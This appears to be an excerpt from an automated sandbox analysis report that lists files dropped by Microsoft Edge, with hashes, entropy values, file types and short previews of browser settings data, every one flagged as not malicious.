                                                                                                                                                                                                                                                                                              Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"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
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):44137
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.090712595208555
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:768:zDXzgWPsj/qlGJqIY8GB4kkBMYwuF9hDO6vP6O+Ntbzy70FqHoPFkGoup1Xl3jVu:z/Ps+wsI7ynEq6Etbz8hu3VlXr4CRo1
                                                                                                                                                                                                                                                                                              MD5:73DF81E396DAE87AF398D8AB243AB1B5
                                                                                                                                                                                                                                                                                              SHA1:D3AB453F63D56C98D969E707BBA12253F600FB47
                                                                                                                                                                                                                                                                                              SHA-256:90C49E3412F0337C8BD69B1A6D6182C867A33F01B74CDB2E14FA15FEB5606BE8
                                                                                                                                                                                                                                                                                              SHA-512:824D9B0666E3E40542C5A86ED7007C8546FE27D07A962A3052EB4DF28ECC6844D236DFF99F30DCA334D7D743570B695F8CF439CE126EB3F038A7A9C818D99E52
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):44137
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.090712595208555
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:768:zDXzgWPsj/qlGJqIY8GB4kkBMYwuF9hDO6vP6O+Ntbzy70FqHoPFkGoup1Xl3jVu:z/Ps+wsI7ynEq6Etbz8hu3VlXr4CRo1
                                                                                                                                                                                                                                                                                              MD5:73DF81E396DAE87AF398D8AB243AB1B5
                                                                                                                                                                                                                                                                                              SHA1:D3AB453F63D56C98D969E707BBA12253F600FB47
                                                                                                                                                                                                                                                                                              SHA-256:90C49E3412F0337C8BD69B1A6D6182C867A33F01B74CDB2E14FA15FEB5606BE8
                                                                                                                                                                                                                                                                                              SHA-512:824D9B0666E3E40542C5A86ED7007C8546FE27D07A962A3052EB4DF28ECC6844D236DFF99F30DCA334D7D743570B695F8CF439CE126EB3F038A7A9C818D99E52
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"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
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):44137
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.090712595208555
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:768:zDXzgWPsj/qlGJqIY8GB4kkBMYwuF9hDO6vP6O+Ntbzy70FqHoPFkGoup1Xl3jVu:z/Ps+wsI7ynEq6Etbz8hu3VlXr4CRo1
                                                                                                                                                                                                                                                                                              MD5:73DF81E396DAE87AF398D8AB243AB1B5
                                                                                                                                                                                                                                                                                              SHA1:D3AB453F63D56C98D969E707BBA12253F600FB47
                                                                                                                                                                                                                                                                                              SHA-256:90C49E3412F0337C8BD69B1A6D6182C867A33F01B74CDB2E14FA15FEB5606BE8
                                                                                                                                                                                                                                                                                              SHA-512:824D9B0666E3E40542C5A86ED7007C8546FE27D07A962A3052EB4DF28ECC6844D236DFF99F30DCA334D7D743570B695F8CF439CE126EB3F038A7A9C818D99E52
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"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
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):44137
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.090712595208555
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:768:zDXzgWPsj/qlGJqIY8GB4kkBMYwuF9hDO6vP6O+Ntbzy70FqHoPFkGoup1Xl3jVu:z/Ps+wsI7ynEq6Etbz8hu3VlXr4CRo1
                                                                                                                                                                                                                                                                                              MD5:73DF81E396DAE87AF398D8AB243AB1B5
                                                                                                                                                                                                                                                                                              SHA1:D3AB453F63D56C98D969E707BBA12253F600FB47
                                                                                                                                                                                                                                                                                              SHA-256:90C49E3412F0337C8BD69B1A6D6182C867A33F01B74CDB2E14FA15FEB5606BE8
                                                                                                                                                                                                                                                                                              SHA-512:824D9B0666E3E40542C5A86ED7007C8546FE27D07A962A3052EB4DF28ECC6844D236DFF99F30DCA334D7D743570B695F8CF439CE126EB3F038A7A9C818D99E52
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"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
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):44137
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.090712595208555
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:768:zDXzgWPsj/qlGJqIY8GB4kkBMYwuF9hDO6vP6O+Ntbzy70FqHoPFkGoup1Xl3jVu:z/Ps+wsI7ynEq6Etbz8hu3VlXr4CRo1
                                                                                                                                                                                                                                                                                              MD5:73DF81E396DAE87AF398D8AB243AB1B5
                                                                                                                                                                                                                                                                                              SHA1:D3AB453F63D56C98D969E707BBA12253F600FB47
                                                                                                                                                                                                                                                                                              SHA-256:90C49E3412F0337C8BD69B1A6D6182C867A33F01B74CDB2E14FA15FEB5606BE8
                                                                                                                                                                                                                                                                                              SHA-512:824D9B0666E3E40542C5A86ED7007C8546FE27D07A962A3052EB4DF28ECC6844D236DFF99F30DCA334D7D743570B695F8CF439CE126EB3F038A7A9C818D99E52
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"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
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):44137
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.090712595208555
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:768:zDXzgWPsj/qlGJqIY8GB4kkBMYwuF9hDO6vP6O+Ntbzy70FqHoPFkGoup1Xl3jVu:z/Ps+wsI7ynEq6Etbz8hu3VlXr4CRo1
                                                                                                                                                                                                                                                                                              MD5:73DF81E396DAE87AF398D8AB243AB1B5
                                                                                                                                                                                                                                                                                              SHA1:D3AB453F63D56C98D969E707BBA12253F600FB47
                                                                                                                                                                                                                                                                                              SHA-256:90C49E3412F0337C8BD69B1A6D6182C867A33F01B74CDB2E14FA15FEB5606BE8
                                                                                                                                                                                                                                                                                              SHA-512:824D9B0666E3E40542C5A86ED7007C8546FE27D07A962A3052EB4DF28ECC6844D236DFF99F30DCA334D7D743570B695F8CF439CE126EB3F038A7A9C818D99E52
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"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
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):44137
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.090712595208555
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:768:zDXzgWPsj/qlGJqIY8GB4kkBMYwuF9hDO6vP6O+Ntbzy70FqHoPFkGoup1Xl3jVu:z/Ps+wsI7ynEq6Etbz8hu3VlXr4CRo1
                                                                                                                                                                                                                                                                                              MD5:73DF81E396DAE87AF398D8AB243AB1B5
                                                                                                                                                                                                                                                                                              SHA1:D3AB453F63D56C98D969E707BBA12253F600FB47
                                                                                                                                                                                                                                                                                              SHA-256:90C49E3412F0337C8BD69B1A6D6182C867A33F01B74CDB2E14FA15FEB5606BE8
                                                                                                                                                                                                                                                                                              SHA-512:824D9B0666E3E40542C5A86ED7007C8546FE27D07A962A3052EB4DF28ECC6844D236DFF99F30DCA334D7D743570B695F8CF439CE126EB3F038A7A9C818D99E52
                                                                                                                                                                                                                                                                                              Malicious:false
Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:FoxPro FPT, blocks size 512, next free block index 3284796609, field type 0
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):8192
                                                                                                                                                                                                                                                                                              Entropy (8bit):0.01057775872642915
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:3:MsFl:/F
                                                                                                                                                                                                                                                                                              MD5:CF89D16BB9107C631DAABF0C0EE58EFB
                                                                                                                                                                                                                                                                                              SHA1:3AE5D3A7CF1F94A56E42F9A58D90A0B9616AE74B
                                                                                                                                                                                                                                                                                              SHA-256:D6A5FE39CD672781B256E0E3102F7022635F1D4BB7CFCC90A80FFFE4D0F3877E
                                                                                                                                                                                                                                                                                              SHA-512:8CB5B059C8105EB91E74A7D5952437AAA1ADA89763C5843E7B0F1B93D9EBE15ED40F287C652229291FAC02D712CF7FF5ECECEF276BA0D7DDC35558A3EC3F77B0
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):270336
                                                                                                                                                                                                                                                                                              Entropy (8bit):8.280239615765425E-4
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:3:MsEllllkEthXllkl2:/M/xT02
                                                                                                                                                                                                                                                                                              MD5:D0D388F3865D0523E451D6BA0BE34CC4
                                                                                                                                                                                                                                                                                              SHA1:8571C6A52AACC2747C048E3419E5657B74612995
                                                                                                                                                                                                                                                                                              SHA-256:902F30C1FB0597D0734BC34B979EC5D131F8F39A4B71B338083821216EC8D61B
                                                                                                                                                                                                                                                                                              SHA-512:376011D00DE659EB6082A74E862CFAC97A9BB508E0B740761505142E2D24EC1C30AA61EFBC1C0DD08FF0F34734444DE7F77DD90A6CA42B48A4C7FAD5F0BDDD17
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):8192
                                                                                                                                                                                                                                                                                              Entropy (8bit):0.011852361981932763
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:3:MsHlDll:/H
                                                                                                                                                                                                                                                                                              MD5:0962291D6D367570BEE5454721C17E11
                                                                                                                                                                                                                                                                                              SHA1:59D10A893EF321A706A9255176761366115BEDCB
                                                                                                                                                                                                                                                                                              SHA-256:EC1702806F4CC7C42A82FC2B38E89835FDE7C64BB32060E0823C9077CA92EFB7
                                                                                                                                                                                                                                                                                              SHA-512:F555E961B69E09628EAF9C61F465871E6984CD4D31014F954BB747351DAD9CEA6D17C1DB4BCA2C1EB7F187CB5F3C0518748C339C8B43BBD1DBD94AEAA16F58ED
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):8192
                                                                                                                                                                                                                                                                                              Entropy (8bit):0.012340643231932763
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:3:MsGl3ll:/y
                                                                                                                                                                                                                                                                                              MD5:41876349CB12D6DB992F1309F22DF3F0
                                                                                                                                                                                                                                                                                              SHA1:5CF26B3420FC0302CD0A71E8D029739B8765BE27
                                                                                                                                                                                                                                                                                              SHA-256:E09F42C398D688DCE168570291F1F92D079987DEDA3099A34ADB9E8C0522B30C
                                                                                                                                                                                                                                                                                              SHA-512:E9A4FC1F7CB6AE2901F8E02354A92C4AAA7A53C640DCF692DB42A27A5ACC2A3BFB25A0DE0EB08AB53983132016E7D43132EA4292E439BB636AAFD53FB6EF907E
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:FoxPro FPT, blocks size 768, next free block index 3284796353, field type 0
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):262512
                                                                                                                                                                                                                                                                                              Entropy (8bit):9.553120663130604E-4
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:3:LsNlg0+tl:Ls3g0+tl
                                                                                                                                                                                                                                                                                              MD5:54749AE87A9B41A681AE34687B0FA0EE
                                                                                                                                                                                                                                                                                              SHA1:B49F23B4B119386993B4950AA890F10BCDBF7C9A
                                                                                                                                                                                                                                                                                              SHA-256:5EC043136A9865E697E32E0F6AC7ED548F1ECE1A1FFB8244DE14C52CACDB6345
                                                                                                                                                                                                                                                                                              SHA-512:0EB5DFD1025DD1B87A765658FF040B376C7ACC7FE427FC4D5DB29C9E24E1625EDBE0A30ADED59CEDE484DB044F584D4000DDB8275583CE3EF2703266E41A1CA7
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):47
                                                                                                                                                                                                                                                                                              Entropy (8bit):4.3818353308528755
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:3:2jRo6jhM6ceYcUtS2djIn:5I2uxUt5Mn
                                                                                                                                                                                                                                                                                              MD5:48324111147DECC23AC222A361873FC5
                                                                                                                                                                                                                                                                                              SHA1:0DF8B2267ABBDBD11C422D23338262E3131A4223
                                                                                                                                                                                                                                                                                              SHA-256:D8D672F953E823063955BD9981532FC3453800C2E74C0CC3653D091088ABD3B3
                                                                                                                                                                                                                                                                                              SHA-512:E3B5DB7BA5E4E3DE3741F53D91B6B61D6EB9ECC8F4C07B6AE1C2293517F331B716114BAB41D7935888A266F7EBDA6FABA90023EFFEC850A929986053853F1E02
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Preview:customSettings_F95BA787499AB4FA9EFFF472CE383A14
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):35
                                                                                                                                                                                                                                                                                              Entropy (8bit):4.014438730983427
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:3:YDMGA2ADH/AYKEqsYq:YQXT/bKE1F
                                                                                                                                                                                                                                                                                              MD5:BB57A76019EADEDC27F04EB2FB1F1841
                                                                                                                                                                                                                                                                                              SHA1:8B41A1B995D45B7A74A365B6B1F1F21F72F86760
                                                                                                                                                                                                                                                                                              SHA-256:2BAE8302F9BD2D87AE26ACF692663DF1639B8E2068157451DA4773BD8BD30A2B
                                                                                                                                                                                                                                                                                              SHA-512:A455D7F8E0BE9A27CFB7BE8FE0B0E722B35B4C8F206CAD99064473F15700023D5995CC2C4FAFDB8FBB50F0BAB3EC8B241E9A512C0766AAAE1A86C3472C589FFD
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Preview:{"forceServiceDetermination":false}
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):81
                                                                                                                                                                                                                                                                                              Entropy (8bit):4.3439888556902035
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:3:kDnaV6bVsFUIMf1HDOWg3djTHXoSWDSQ97P:kDYaoUIe1HDM3oskP
                                                                                                                                                                                                                                                                                              MD5:177F4D75F4FEE84EF08C507C3476C0D2
                                                                                                                                                                                                                                                                                              SHA1:08E17AEB4D4066AC034207420F1F73DD8BE3FAA0
                                                                                                                                                                                                                                                                                              SHA-256:21EE7A30C2409E0041CDA6C04EEE72688EB92FE995DC94487FF93AD32BD8F849
                                                                                                                                                                                                                                                                                              SHA-512:94FC142B3CC4844BF2C0A72BCE57363C554356C799F6E581AA3012E48375F02ABD820076A8C2902A3C6BE6AC4D8FA8D4F010D4FF261327E878AF5E5EE31038FB
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Preview:edgeSettings_2.0-48b11410dc937a1723bf4c5ad33ecdb286d8ec69544241bc373f753e64b396c1
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):130439
                                                                                                                                                                                                                                                                                              Entropy (8bit):3.80180718117079
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:1536:RlIyFAMrwvaGbyLWzDr6PDofI8vsUnPRLz+PMh:weWGP7Eh
                                                                                                                                                                                                                                                                                              MD5:EB75CEFFE37E6DF9C171EE8380439EDA
                                                                                                                                                                                                                                                                                              SHA1:F00119BA869133D64E4F7F0181161BD47968FA23
                                                                                                                                                                                                                                                                                              SHA-256:48B11410DC937A1723BF4C5AD33ECDB286D8EC69544241BC373F753E64B396C1
                                                                                                                                                                                                                                                                                              SHA-512:044C5113D877CE2E3B42CF07670620937ED7BE2D8B3BF2BAB085C43EF4F64598A7AC56328DDBBE7F0F3CFB9EA49D38CA332BB4ECBFEDBE24AE53B14334A30C8E
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Preview:{.. "geoidMaps": {.. "au": "https://australia.smartscreen.microsoft.com/",.. "ch": "https://switzerland.smartscreen.microsoft.com/",.. "eu": "https://europe.smartscreen.microsoft.com/",.. "ffl4": "https://unitedstates1.ss.wd.microsoft.us/",.. "ffl4mod": "https://unitedstates4.ss.wd.microsoft.us/",.. "ffl5": "https://unitedstates2.ss.wd.microsoft.us/",.. "in": "https://india.smartscreen.microsoft.com/",.. "test": "https://eu-9.smartscreen.microsoft.com/",.. "uk": "https://unitedkingdom.smartscreen.microsoft.com/",.. "us": "https://unitedstates.smartscreen.microsoft.com/",.. "gw_au": "https://australia.smartscreen.microsoft.com/",.. "gw_ch": "https://switzerland.smartscreen.microsoft.com/",.. "gw_eu": "https://europe.smartscreen.microsoft.com/",.. "gw_ffl4": "https://unitedstates1.ss.wd.microsoft.us/",.. "gw_ffl4mod": "https://unitedstates4.ss.wd.microsoft.us/",.. "gw_ffl5": "https://unitedstates2.ss.wd.microsoft.us/",.. "gw_in": "https
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):40
                                                                                                                                                                                                                                                                                              Entropy (8bit):4.346439344671015
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:3:kfKbUPVXXMVQX:kygV5
                                                                                                                                                                                                                                                                                              MD5:6A3A60A3F78299444AACAA89710A64B6
                                                                                                                                                                                                                                                                                              SHA1:2A052BF5CF54F980475085EEF459D94C3CE5EF55
                                                                                                                                                                                                                                                                                              SHA-256:61597278D681774EFD8EB92F5836EB6362975A74CEF807CE548E50A7EC38E11F
                                                                                                                                                                                                                                                                                              SHA-512:C5D0419869A43D712B29A5A11DC590690B5876D1D95C1F1380C2F773CA0CB07B173474EE16FE66A6AF633B04CC84E58924A62F00DCC171B2656D554864BF57A4
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Preview:synchronousLookupUris_638343870221005468
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):57
                                                                                                                                                                                                                                                                                              Entropy (8bit):4.556488479039065
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:3:GSCIPPlzYxi21goD:bCWBYx99D
                                                                                                                                                                                                                                                                                              MD5:3A05EAEA94307F8C57BAC69C3DF64E59
                                                                                                                                                                                                                                                                                              SHA1:9B852B902B72B9D5F7B9158E306E1A2C5F6112C8
                                                                                                                                                                                                                                                                                              SHA-256:A8EF112DF7DAD4B09AAA48C3E53272A2EEC139E86590FD80E2B7CBD23D14C09E
                                                                                                                                                                                                                                                                                              SHA-512:6080AEF2339031FAFDCFB00D3179285E09B707A846FD2EA03921467DF5930B3F9C629D37400D625A8571B900BC46021047770BAC238F6BAC544B48FB3D522FB0
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Preview:9.......murmur3.............,M.h...Z...8.\..<&Li.H..[.?m
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):29
                                                                                                                                                                                                                                                                                              Entropy (8bit):4.030394788231021
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:3:0xXeZUSXkcVn:0Re5kcV
                                                                                                                                                                                                                                                                                              MD5:52E2839549E67CE774547C9F07740500
                                                                                                                                                                                                                                                                                              SHA1:B172E16D7756483DF0CA0A8D4F7640DD5D557201
                                                                                                                                                                                                                                                                                              SHA-256:F81B7B9CE24F5A2B94182E817037B5F1089DC764BC7E55A9B0A6227A7E121F32
                                                                                                                                                                                                                                                                                              SHA-512:D80E7351E4D83463255C002D3FDCE7E5274177C24C4C728D7B7932D0BE3EBCFEB68E1E65697ED5E162E1B423BB8CDFA0864981C4B466D6AD8B5E724D84B4203B
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Preview:topTraffic_638004170464094982
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):575056
                                                                                                                                                                                                                                                                                              Entropy (8bit):7.999649474060713
                                                                                                                                                                                                                                                                                              Encrypted:true
                                                                                                                                                                                                                                                                                              SSDEEP:12288:fXdhUG0PlM/EXEBQlbk19RrH76Im4u8C1jJodha:Ji80e9Rb7Tm4u8CnR
                                                                                                                                                                                                                                                                                              MD5:BE5D1A12C1644421F877787F8E76642D
                                                                                                                                                                                                                                                                                              SHA1:06C46A95B4BD5E145E015FA7E358A2D1AC52C809
                                                                                                                                                                                                                                                                                              SHA-256:C1CE928FBEF4EF5A4207ABAFD9AB6382CC29D11DDECC215314B0522749EF6A5A
                                                                                                                                                                                                                                                                                              SHA-512:FD5B100E2F192164B77F4140ADF6DE0322F34D7B6F0CF14AED91BACAB18BB8F195F161F7CF8FB10651122A598CE474AC4DC39EDF47B6A85C90C854C2A3170960
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:raw G3 (Group 3) FAX, byte-padded
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):460992
                                                                                                                                                                                                                                                                                              Entropy (8bit):7.999625908035124
                                                                                                                                                                                                                                                                                              Encrypted:true
                                                                                                                                                                                                                                                                                              SSDEEP:12288:KaRwcD8XXTZGZJHXBjOVX3xFttENr4+3eGPnKvJWXrydqb:KaR5oZ2MBFt8r4+3eG/URdqb
                                                                                                                                                                                                                                                                                              MD5:E9C502DB957CDB977E7F5745B34C32E6
                                                                                                                                                                                                                                                                                              SHA1:DBD72B0D3F46FA35A9FE2527C25271AEC08E3933
                                                                                                                                                                                                                                                                                              SHA-256:5A6B49358772DB0B5C682575F02E8630083568542B984D6D00727740506569D4
                                                                                                                                                                                                                                                                                              SHA-512:B846E682427CF144A440619258F5AA5C94CAEE7612127A60E4BD3C712F8FF614DA232D9A488E27FC2B0D53FD6ACF05409958AEA3B21EA2C1127821BD8E87A5CA
                                                                                                                                                                                                                                                                                              Malicious:false
